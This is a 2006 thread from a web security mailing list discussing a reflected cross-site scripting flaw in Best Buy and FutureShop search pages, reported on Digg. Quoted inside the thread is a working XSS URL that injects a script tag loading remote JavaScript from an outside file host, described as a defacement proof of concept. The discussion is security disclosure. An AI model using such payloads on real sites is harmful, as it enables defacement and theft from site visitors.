[WEB SECURITY] Best Buy XSS bug posted to Digg
Jeremiah Grossman
jeremiah at whitehatsec.com
Thu Jan 12 18:55:28 EST 2006
They may have already fixed it since it was first disclosed.
Regards,
Jeremiah-
On Jan 12, 2006, at 3:45 PM, Our World Is Here wrote:
> This did not work. Firefox 1.5
>
> I got a normal 404 custom Best buy error message on both
> bestbuy.com and
> bestbuy.ca
>
> Cheers,
>
> James Friesen, CIO
>
> Lucretia Enterprises
> "Our World Is Here..."
> Info at lucretia dot ca
> http://lucretia.ca
>
>
>> -----Original Message-----
>> From: Jeremiah Grossman [mailto:jeremiah at whitehatsec.com]
>> Sent: Thursday, January 12, 2006 10:37 AM
>> To: Our World Is Here
>> Subject: Re: [WEB SECURITY] Best Buy XSS bug posted to Digg
>>
>> After the page is loaded, you'll notice it changes to a black
>> background with "Don't panic" in red. Basically a simple XSS
>> defacement proof of concept demo. freeuploader is just used
>> to host the JS exploit code.
>>
>> http://www.freeuploader.com/view.php/96559.txt
>>
>>
>>
>>
>> On Jan 11, 2006, at 5:00 PM, Our World Is Here wrote:
>>
>>> What exactly is this supposed to do?
>>>
>>> I tested the links on those sites, and got searches cannot be found
>>> please try again.
>>>
>>> http://www.futureshop.ca/search/searchresult.asp?keyword=%3Cscript%20language=%22javascript%22%20src=%22http://www.freeuploader.com/view.php/96559.txt%22%3E%3C/script%3E
>>>
>>> I'm assuming you think it would reload freeuploader? The blog was
>>> seriously deprived of 'info'.
>>>
>>> Cheers,
>>>
>>> James Friesen
>>>
>>>> -----Original Message-----
>>>> From: Jeremiah Grossman [mailto:jeremiah at whitehatsec.com]
>>>> Sent: Wednesday, January 11, 2006 2:30 PM
>>>> To: websecurity at webappsec.org
>>>> Subject: [WEB SECURITY] Best Buy XSS bug posted to Digg
>>>>
>>>> http://digg.com/security/BestBuy_Code_Injection_Vulnerability
>>>>
>>>> Notice the posted link is shortened (disguised?) using Yatuc.
>>>>
>>>> In the comments, FutureShop is also mentioned as being vulnerable.
>>>>
>>>>
>>>> Regards,
>>>>
>>>> Jeremiah-
>>>>
>>>>
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/